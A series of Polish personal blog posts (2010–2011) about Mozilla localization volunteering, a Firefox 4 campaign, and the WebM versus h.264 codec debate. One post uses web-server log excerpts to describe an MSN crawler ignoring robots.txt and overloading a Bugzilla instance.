Po zakończeniu pracy nad Web O’Wonder, Krzysiek pomaga przy kilku innych projektach specjalnych – tłumaczy m.inn. grę mobilną Spark. Poza Krzyśkiem, pomaga nam też Pitazboras, oraz siecobywatel, a gro pracy wykonał Teo.
Poza wysokiej jakości tłumaczeniami, Krzysiek napisał także dodatek do Thunderbirda – Glasser i mam nadzieje, że będzie miał ochotę na pracę z naszym zespołem przy następnych projektach 🙂

A za tłumaczenie WoW należą się Krzyśkowi gratulacje!

p.s. Jeśli masz ochotę się przyłączyć i pomóc z tłumaczeniem, załóż konto na Verbatimie i dodaj sugestie. Jeśli chciałbyś (chciałabyś) przejąć któreś z tłumaczeń, wyślij mi maila na zbigniew at aviary kropka pl.


zbraniecki, 16 marca 2011, 19:25

23 lutego 2011

polski – stream of bytes

Mini kampania z okazji wydania Firefoksa 4

Wraz z nadchodzącym wydaniem Firefoksa 4 Mozilla planuje małą kampanię promującą HTML5&Friends.

Aviary.pl szuka osób chętnych do pomocy w tłumaczeniu tej strony. Oferujemy dostęp do serwera testowego, niewielką ilość stringów do przetłumaczenia i sporą dawkę zasłużonego poczucia dobrze wykonanej roboty.

Zainteresowanych zapraszam do mailowania do mnie (zbraniecki at aviary dot pl) lub od razu do wejścia na Verbatim –  – zakładasz konto i dodajesz sugestie.

Uwaga, wysoka jakość tłumaczenia może skutkować niemoralnymi ofertami dalszej współpracy ze strony Aviary.pl 😉

zbraniecki, 23 lutego 2011, 21:11

14 stycznia 2011

polski – stream of bytes

Video w sieci rok później

Rok temu popełniłem wpis, w którym opisałem jak wygląda sytuacja z kodekami wideo, stanowisko jakie Mozilla Foundation przyjęła w tej kwestii oraz widoki na przyszłość.

W komentarzach napotkałem duży opór, większość komentujących miała zdanie skrajnie odmienne ode mnie, pisząc o nieuchronnym upadku Mozilli, rychłym spadku popularności Firefoksa, bezsensowności stawania na przekór tak potężnym firmom jak Google, Apple czy Microsoft…

Wystarczy, nie lubię wyżywać się, a poza tym tamta dyskusja była nie fair – ja pisząc to wiedziałem, że Google uwolni VP8, moi rozmówcy mogli odczytać moje słowa jako pobożne życzenia – wszak nic wtedy jeszcze na to nie wskazywało.

Summa summarum, dziś sytuacja jest odmienna. Wydaje mi się, że nasza postawa miała niebagatelny wpływ na decyzje Google o porzuceniu h.264, choć sądzę, że nasz wpływ był raczej pośredni – zatrzymaliśmy adopcję h.264, utrzymaliśmy pole otwartym, tak, że Google opłacało się postawić na WebM. Jestem dumny z tego jak Mozilla korzysta ze swojej pozycji do realizacji celów statutowych.

Nie wygraliśmy tego jeszcze – wciąż do przekonania są Apple i Microsoft i podejrzewam, że ta druga firma będzie łatwiejszym partnerem, ale krajobraz po roku czasu jest znacząco odmienny.

Co przyniesie następny rok? Sądzę, że dystans jaki dzieli WebM i h.264 w zakresie wsparcia sprzętowego zniknie, Adobe Flash zacznie wspierać VP8 (a może i WebM?), Microsoft dołączy wsparcie dla WebM, a Apple stanie przed trudnym wyborem… a jak będzie naprawde? Czas pokaże 🙂

zbraniecki, 14 stycznia 2011, 14:39

7 stycznia 2011

polski – stream of bytes

Wywiad O Fx4 i nie tylko

Aż trudno uwierzyć, że nie pisałem tu od 2 miesięcy… Zagrzebałem się w projekt L20n tak głęboko, że nie znajdywałem w sobie motywacji do blogowania. :/ Obiecałem sobie w tym roku to zmieniać, bo wierzę, że komunikowanie tego co się robi pomaga całej społeczności – zatem spodziewajcie się więcej i krzycie jak będę lagował 😉

Na początek roku podrzucam wywiad który ukazał się na firefox.bajo.pl – miłej lektury i czekam na opinie 🙂

zbraniecki, 7 stycznia 2011, 16:29

5 lutego 2010

polski – stream of bytes

Blokowanie zalewu robotów MSNu

Mniej więcej pod koniec grudnia, odezwał się do mnie dostawca hostingu dla aviary.pl – Dreamhost.

Napisali do mnie, że niestety muszą mnie prosić o zdjęcie serwisu bugs.aviary.pl ze względu na ogromne obciążenie łącza jakie ten serwis generuje.

To oczywiście dość mocny cios w postawowy mechanizm jakiego używa Aviary.pl do swojej pracy i na dodatek cios w punkt, na którym nie znam się aż tak dobrze (nie znam kodu Bugzilli aby ocenić co wpływa na jej wydajność). Pan z DH poinformował, że wygląda na to, że nasza bugs.aviary.pl zużywa ogromne zasoby procesora i rejestruje bardzo wysoką liczbę odwiedzin z robota MSN.

To natchnęło mnie by założyć system statystyczny i zacząć obserwować. Z DH dogadaliśmy się, że zamykamy bugzillę do czasu gdy zrozumiemy przyczynę tak dużego obciążenia.

W okresie świąt i nowego roku trudno było znaleźć czas na pracę nad tym, ale gdy w końcu się zebrałem, logi okazały się bezlitosne. Nasza Bugzilla dziennie obsługuje nasz zespół (trochę ponad 20 osób) plus odwiedzających, co powinno, na moje oko, dawać koło 60-80 osób dziennie, koło 150 wizyt, koło 600 stron.

Zamiast tego, w październiku rejestrowaliśmy średnio 6500 pobrań stron dziennie, w listopadzie 7000 a w grudniu dochodziło do 8000. To znacząca różnica zwłaszcza, że te żądania w znacznej części dotyczyły złożonych kwerend wyszukiwawczych i załączników. Takie kwerendy generują największe obciążenie serwera i są najwolniejsze.

Następnym wnioskiem było to, że około 84% tego ruchu generowane jest przez hosty w domenie 65.55 oraz 66.249 zaś najpopularniejszą przeglądarką jest msnbot/2.0b która pobrała w listopadzie 157000 stron, czyli około 13000 stron dziennie! Na dalszych miejscach było Googlebot z 2500 i Yahoo Slurp! z 166 zapytaniami dziennie.

Pierwszą reakcją było oczywiście założenie robots.txt, które powinno załatwić sprawę oraz lektura google w poszukiwaniu podobnych przypadków. Lekcja pierwsza mówiła, że są dobre i złe roboty. Dobre to takie, które sprawdzają robots.txt i jak ten mówi “nie” to nie przeszukują oraz złe, takie, które ignorują robots.txt.

Oczywiście po chwili okazało się, że msnbot/2.0b, który przychodzi do mnie z domen takich jak msnbot-65-55-104-75.search.msn.com czy msnbot-65-55-104-59.search.msn.com jest złym robotem, który ignoruje plik dla niego przygotowany (mimo, że czyta go, oj czyta, tak mniej więcej co 30 sekund przez 24h na dobę!).

Ciekawą reakcją (obserwowaną także przez innych adminow) jest to, że po włączeniu robots.txt, msnbot zaczyna oszukiwać. Mianowicie odpytuje robots.txt jako msnbot, znajduje informację, że go nie chcemy a następnie zaczyna indeksować strony podając się za Internet Explorera 6.

Przykład takiego zachowania:

65.55.51.69 - - [03/Feb/2010:14:05:41 -0800] "GET /robots.txt HTTP/1.1" 200 319 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.110.210 - - [03/Feb/2010:14:06:12 -0800] "GET /attachment.cgi?id=453&action=diff&context=patch&collapsed=&headers=1&format=raw HTTP/1.1" 200 841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2;  SLCC1;  .NET CLR 1.1.4322;  .NET CLR 2.0.40607)" 
msnbot-65-55-232-33.search.msn.com - - [03/Feb/2010:14:06:30 -0800] "GET /attachment.cgi?id=132&action=edit HTTP/1.1" 200 477 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2;  SV1;  .NET CLR 1.1.4322;  .NET CLR 2.0.50727;  .NET CLR 3.0.04506.648)" 
msnbot-65-55-232-33.search.msn.com - - [03/Feb/2010:14:06:44 -0800] "GET /attachment.cgi?bugid=189&action=viewall HTTP/1.1" 200 477 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;  SLCC1;  .NET CLR 1.1.4322;  .NET CLR 2.0.50727;  .NET CLR 3.0.30729;  .NET CLR 3.5.30729;  InfoPath.2)" 
65.55.110.210 - - [03/Feb/2010:14:06:47 -0800] "GET /attachment.cgi?id=784&action=diff&context=patch&collapsed=&headers=1&format=raw HTTP/1.1" 200 2160 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2;  SLCC1;  .NET CLR 1.1.4325;  .NET CLR 2.0.50727;  .NET CLR 3.0.04506.648)" 
msnbot-65-55-232-33.search.msn.com - - [03/Feb/2010:14:06:50 -0800] "GET /attachment.cgi?bugid=189&action=viewall HTTP/1.1" 200 477 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;  SLCC1;  .NET CLR 1.1.4322;  .NET CLR 2.0.50727;  .NET CLR 3.0.30729;  .NET CLR 3.5.30729;  InfoPath.2)"
msnbot-65-55-104-75.search.msn.com - - [03/Feb/2010:14:07:16 -0800] "GET /attachment.cgi?bugid=1098&action=viewall HTTP/1.1" 200 477 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;  SLCC1;  .NET CLR 1.1.4322)" 

Uważny czytelnik zwróci uwagę, że bot posługuje się różnymi UA stringami, różnymi adresami IP (tak na prawde to jest ich znacznie więcej, rotują się jednak raz na kilka godzin więc trudno było to ładnie ująć w wycinku logu) i identyfikują MSN albo przez host, albo przez UA, albo w ogóle! (wiersz drugi) W takiej sytuacji domyślenie się koincydencji (oraz odwiedzin z domeny 65.55.*.* na polskim serwisie polskiego zespołu lokalizacyjnego) wymaga logicznego rozumowania i jest trudne do zapisania w sposób algorytmiczny.

Uważam takie zachowanie za skandaliczne, choć później okazało się, że nie oni jedni.

Google zachowuje się w miare sensownie i utrzymuje stałe IP crawlera, co pozwala go wyciąć po nim. Yahoo podobnie. Natomiast przedwczoraj zaatakował crawler WP, który również zignorował robots.txt i przez 3 godziny indeksował każdą kombinację kwerend wyszukania i załączniki jakie mamy w naszej Bugzilli.

Mimo to, że takich problemów mam więcej, najważniejsze są implikacje takich zachowań:

1) Jakie obciążenie generuje dla serwisów dynamicznych taki robot. Proszę zrozumieć skalę! Ten robot atakuje falami, co godzinę, przez 24 godziny na dobę, przez wszystkie dni w miesiącu, za każdym razem generując falę zapytań na poziomie 100 zapytań w minutę! I to nie są zapytania o pliki statyczne, CSS, JS czy PNG. To wyłącznie zapytania o strony! Jakie koszty to generuje, jakie obciążenie… to absurd

2) Robot, który wedle logów zaczął działac mniej więcej po uruchomieniu wyszukiwarki bing, ignoruje kontrakt społeczny między autorami stron i wyszukiwarkami i indeksuje wszystko pomimo, że pobiera też robots.txt który mu tego zabrania.

3) Jaki ma to wpływ na statystyki IE? W moim, bardzo starym mechanizmie statystyk (webalizer chyba – to dostarcza DH) ma ogromny. Aktualnie wedle niego bugs.aviary.pl odwiedza 80% użytkowników z IE6.

Na koniec dodam tylko, że obecnie stosuję niniejszy .htaccess do blokowania tego ile się da.

zbraniecki, 5 lutego 2010, 13:18

23 stycznia 2010

polski – stream of bytes

Mozilla, wolność i h.264

Uwaga: poniższy tekst, to moja prywatna opinia, jako członka projektu Mozilla.

W tym tygodniu nastąpił ważny moment w historii rozwoju WWW. Youtube i Vimeo ogłosiły plany odejścia od technologii Flash na rzecz standardu HTML5.

Kawałek historii

Blisko rok temu, Mozilla ogłosiła wprowadzenie tagu <video/> i rozpoczęła promowanie go, jako alternatywy dla zamkniętych wtyczek.

Wiele osób wtedy krytykowało tę decyzję. Zwracano uwagę, że nikt inny tego nie wprowadza, że HTML5 to jeszcze nie jest standard, że Ogg/Theora, kodek, którego używamy, nie jest wystarczająco szybki oraz, że jest za późno, nikt nie zrezygnuje z zamkniętych wtyczek dla otwartego standardu. Ta krytyka nie była bezpodstawna. Wszystkie powyższe punkty były prawdziwe.

To, że dziś rozmawiamy o tym z tak odmiennego punktu widzenia pokazuje tylko jak szybko następują dziś zmiany w świecie standardów w porównaniu do, np. czasu jaki zajęło wprowadzanie standardu CSS2. To ogromny sukces całej społeczności skupionej wokół WWW i wierzę, że Mozilla miała w tym decydującą rolę.

Wracając do tematu, dziś mamy trzy ważne silniki obsługujące <video/> – Presto (Opera), Webkit (Safari, Chrome) i Gecko (Firefox, Camino, Seamonkey, Flock). Mamy rosnącą liczbę stron, które korzystają z tego standardu i rosnącą liczbę użytkowników, którzy korzystają z przeglądarki która je obsługuje. (W Polsce około 50% użytkowników Internetu).

Niestety, Chrome i Safari zdecydowały się wspierać wideo obsługując jedynie kodek o nazwie h.264, który jest zamknięty i trzeba za niego zapłacić. Mozilla uważa, że taki krok jest szkodliwy dla rozwoju Internetu i stoi w sprzeczności z Manifestem Mozilli i w efekcie nowe platformy Vimeo i Youtube nie mogą być wykorzystywane przez Firefoksa.

Wierzymy, że znajdziemy porozumienie, ale na razie sytuacja jest trudna. W tym poście postaram się wytłumaczyć, dlaczego Mozilla uznaje H.264 za zły kodek dla Internetu.

Kodeki

Kodek w dużym uproszczeniu (purystów proszę o przymknięcie oka) jest to mały program, który odpowiada za zakodowanie i odkodowanie danego formatu. Kiedy mówimy o “obrazkach” na komputerze, na myśl przychodzą takie formaty zakodowania jak JPEG, PNG, GIF. Kiedy mówimy o dźwięku, możemy mówić o MP3, OGG, WAV itp.

W przypadku obrazu również korzystamy z kodeków (przykładami mogą być DivX, XviD, MPEG, Theora itp.) i mają one duży wpływ na jakość technologii. Z punktu widzenia użytkownika odpowiadają przede wszystkim za:

Te wszystkie aspekty są bardzo ważne dla popularności i jakości kodeku. Niestety sam standard <video/> nie determinuje jakiego kodeka należy użyć, a świat nie wybrał jednego, uniwersalnego. Każdy ma jakieś wady, zalety, firmy tworzące kodeki promują je (podobnie jak było z DVD+ i DVD-, albo BlueRay i HD-DVD). To zostawia wolne pole do popisu twórcom przeglądarek, którzy mogą sobie wybrać kodek i go wspierać. Na razie…

Te role się odwrócą, gdy wystarczająco dużo treści w Internecie zostanie zakodowana w danym kodeku. Wówczas nierealne stanie się oczekiwanie, że wszyscy przekodują swoje filmy na inny format, bo dana przeglądarka właśnie go obsługuje.

Gra

Zatem “gra” o to, co będzie uniwersalnie zaakceptowane już się rozpoczęła. A gra jest o dużą stawkę. Większość kodeków obłożona jest patentami i jest licencjonowana. Oznacza to, że istnieją komercyjne podmioty kontrolujące co jest wymagane, aby móc zakodować dany film. Dodatkowo, te podmioty kontrolują co jest wymagane, aby wyświetlić tak zakodowany film.

Taka kontrola to ogromna moc. Właściciel może zdecydować czy powoli Ci kodować filmy, czy każe kupić jego oprogramowanie, które może to zrobić. Z drugiej strony może sprzedawać licencje na kodek autorom przeglądarek i w ten sposób kontrolować kto może wyświetlać treści zakodowane przy użyciu należącego do niego kodeka.

Kontrolując zakodowywanie, może decydować kto może wrzucać filmy do Internetu. Kontrolując odkodowywanie, może decydować które przeglądarki będą obsługiwały filmy w Internecie. Jedyne czego potrzebują, to aby wszystkie treści były zakodowane przez ich technologię.

Uwaga. Taka kontrola, choć zazwyczaj jest zła dla użytkownika, bowiem ogranicza mu wybór, nie zawsze musi być tak szkodliwa. Skype korzysta z zamkniętego kodeka, ale nie jest to problem, bowiem cały protokół skype jest zamknięty (co jest większym problemem), zatem nikt nie tworzy alternatywnych aplikacji. Jednak kodek który obsługuje treści w Internecie jest ważny bowiem wpływa na to kto tworzy i kto odbiera treści w Internecie. To potężna broń w walce o to, czy Internet pozostanie wolny, otwarty i dostępny.

Ta gra się rozszerzy kiedy wreszcie włączy się w nią Microsoft, który prawdopodobnie będzie tak jak dotychczas próbował rozszerzyć definicję “otwartego” i “wolnego” na ich schemat myślenia – “wolny do kupienia i otwarty do przeczytania” (RAND).

Naturalną reakcją środowisk zainteresowanych rozwojem Internetu jako medium wolnego i otwartego, jest wykorzystanie otwartego standardu, który może być za darmo zaimplementowany przez każdy program do kodowania filmów i przeglądarki Internetowe. Dzięki temu żadna firma nie może decydować kto ma prawo, a kto nie, i nie kontroluje zasad na jakich się to odbywa co ograniczałoby innowacyjność wykorzystania.

Theora

Niestety kodowanie wideo to bardzo złożony proces algorytmiczny. Bardzo. Wiele firm włożyło bardzo dużo pieniędzy i pracy, aby stworzyć dobrej jakości kodeki, które kompresują wideo do małych rozmiarów zostawiając przy tym dobrą jakość i nie zmuszając procesora do zbyt wytężonej pracy przy odkodowywaniu.

W świecie wolnego oprogramowania i otwartych standardów, taki temat jest dość nowy. W efekcie nie ma zbyt dużego wyboru co do kodeków, którzych możemy użyć. W rzeczywistości istnieją dwie realne opcje. Theora albo Dirac. Oba mają swoje wady i zalety, oba są na dość wczesnym etapie rozwoju i obu trudno jest jeszcze konkurować pod względem jakości z zamkniętymi, ale prace trwają.

Mozilla, wprowadzając Theorę, zdecydowała się wesprzeć ten wolny i otwarty projekt, także finansując pracę autora projektu Thusnelda, który miał na celu przyspieszenie i poprawienie jakości Theory.

Dzięki temu, kodek, który został włączony do Firefoksa 3.5 jest znacznie szybszy, wydajniejszy i gwarantuje lepszej jakości obraz niż Theora wspierała rok wcześniej. To oczywiście nie koniec pracy i kolejne wersje Firefoksa będą implementowały nowe wersje kodeka.

Wraz z Wikimedia i Dailymotion, wprowadziliśmy też Theorę do Wikipedii i Dailymotion.

H.264

Google i Apple z kolei zdecydowały się wspierać H.264 głównie argumentując to lepszą jakością obrazu i powszechnym wykorzystaniem H.264 w takich technologiach jak Blue Ray. Mimo, że różnica w jakości jest cały czas zmniejszana, wszystko wskazuje na to, że te argumenty są słuszne i decyzje tych firm są właściwe.

Mozilla, a H.264 vs. Theora

Tutaj jednak dochodzimy do ważnego momentu. Obie firmy podejmują decyzje, kierując się interesem swoim i konsumentów. Ich decyzje muszą być zoptymalizowane kapitałowo i mieć właściwe przełożenie na dochody właścicieli tych firm, czyli akcjonariuszy.

Mozilla z kolei, jest zarządzana przez fundację non-profit i z tej pozycji, musi optymalizować decyzje pod realizację swoich celów statutowych, a to z kolei powoduje, że musi kierować się długofalowym zyskiem jaki użytkownicy będą mieli nie z Mozilli, a z Internetu.

To zaś powoduje, że H.264 jest kodekiem, którego nie możemy wdrożyć z wielu względów, wymienię kilka z nich (za Roc’iem).

Oczywiście są inne argumenty. Można wydawać przeglądarkę bez kodeka, ale pozwalać użytkownikowi ściągnąć go samemu. Można używać kodeka który jest już w systemie, można kombinować na wiele sposobów, ale wszystko sprowadza się do tego, że H.264 jest szkodliwy i powoduje problemy, których nie można tak po prostu obejść.

W przyszłości, wszystko wskazuje, że MPEG-LA będzie jeszcze restrykcyjniej korzystało ze swojego prawa do pobierania opłat i ograniczało w ten sposób rozwój treści wideo w Internecie. Nie jest to zgodne z naszymi celami i nie uważam, abyśmy powinni się dostosować do decyzji firm takich jak Google i Apple.

Co możemy zrobić?

Niestety niewiele. Firmy, które podjęły swoje decyzje są bardzo niezależne a kontrola Google nad Youtube i Chrome daje bardzo dużo elastyczności w decydowaniu o kolejnych krokach. (czysto teoretycznie, nic nie stoi na przeszkodzie, by Youtube wyświetlał użytkownikom Firefoksa reklamy Chrome przy próbie skorzystania z wersji HTML5)

My zaś, możemy korzystać z naszych najważniejszych aktywów. Społeczności i udziału w rynku. 30% światowego rynku, ponad 40% w Europie to są argumenty, które trudno zignorować. Wiele razy byłem pytany o nasz stosunek do udziału w rynku. Wiele razy mówiłem, że dla Mozilli udział w rynku to narzędzie gwarantujące niezależność i możliwość wpływania na największych graczy. Tym razem, przychodzi nam z tego skorzystać.

Po drugie musimy pamiętać, że wideo w sieci to nie tylko youtube. I ochrona możliwości nieograniczonego tworzenia filmów jest ważniejsza niż jeden serwis.

Po trzecie, pamiętajmy, że nadal nie wiadomo co przyniesie przyszłość. Nie możemy poddawać się wrażeniu, że ta batalia jest już zakończona. Mozilla będzie nadal wspierać i rozwijać Theorę. Będziemy nadal starali się tłumaczyć dlaczego wolne kodeki są ważne.

I będziemy uważnie obserwować i współpracować z Googlem, Operą i Applem nad znalezieniem wspólnego rozwiązania. Google zakupiło pewien czas temu firmę On2, która jest właścicielem kodeków VP6/7/8. Gdyby udało się doprowadzić do otwarcia ich źródeł, moglibyśmy znaleźć się w znacznie lepszym miejscu.

Mam nadzieję, że ten post pomaga zrozumieć złożoność zagadnienia i decyzji Mozilli. Wierzę głęboko, że w przyszłości uda się rozwiązać ten wezeł 🙂

zbraniecki, 23 stycznia 2010, 16:50